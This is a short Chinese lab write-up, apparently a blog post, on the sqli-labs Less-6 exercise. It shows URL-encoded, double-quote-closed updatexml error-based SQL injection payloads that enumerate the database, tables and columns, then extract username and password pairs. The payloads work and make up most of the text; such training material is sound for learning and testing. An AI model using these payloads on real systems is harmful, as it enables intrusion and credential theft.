sql 注入 之sqli-labs/less-6 双注入,双引号报错注入

和第五关类似,只不过闭合符号是双引号

1,查数据库

1"and%20(updatexml(1,concat(0x7e,(select%20database()),0x7e),1))%20--+

2.查表

内容有多行,所以使用limit依次查询

1"and%20(updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1)%20,0x7e),1))%20--+

limit 3,1 查出来users表

?id=1"and%20(updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%203,1)%20,0x7e),1))%20--+

查字段名:

?id=1"and%20(updatexml(1,concat(0x7e,(select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20)%20,0x7e),1))%20--+

返回超过1 行,使用limit进行处理

limit 4,1 返回username字段

limit 5,1 返回password字段

查询字段内容,返回结果超过一行,使用limit函数

/?id=1"and%20(updatexml(1,concat(0x7e,(select%20username%20from%20users)%20,0x7e),1))%20--+

依次进行查询

id=1"and%20(updatexml(1,concat(0x7e,(select%20concat(username,":",password)%20from%20users%20limit%200,1)%20,0x7e),1))%20--+

相关推荐
-SGlow-4 小时前
MySQL相关概念和易错知识点(2)(表结构的操作、数据类型、约束)
linux·运维·服务器·数据库·mysql
新world4 小时前
mybatis-plus从入门到入土(三):持久层接口之IService
mybatis
明月5665 小时前
Oracle 误删数据恢复
数据库·oracle
♡喜欢做梦6 小时前
【MySQL】深入浅出事务:保证数据一致性的核心武器
数据库·mysql
遇见你的雩风6 小时前
MySQL的认识与基本操作
数据库·mysql
dblens 数据库管理和开发工具6 小时前
MySQL新增字段DDL:锁表全解析、避坑指南与实战案例
数据库·mysql·dblens·dblens mysql·数据库连接管理
weixin_419658316 小时前
MySQL的基础操作
数据库·mysql
不辉放弃8 小时前
ZooKeeper 是什么?
数据库·大数据开发
Goona_8 小时前
拒绝SQL恐惧:用Python+pyqt打造任意Excel数据库查询系统
数据库·python·sql·excel·pyqt
程序员编程指南9 小时前
Qt 数据库连接池实现与管理
c语言·数据库·c++·qt·oracle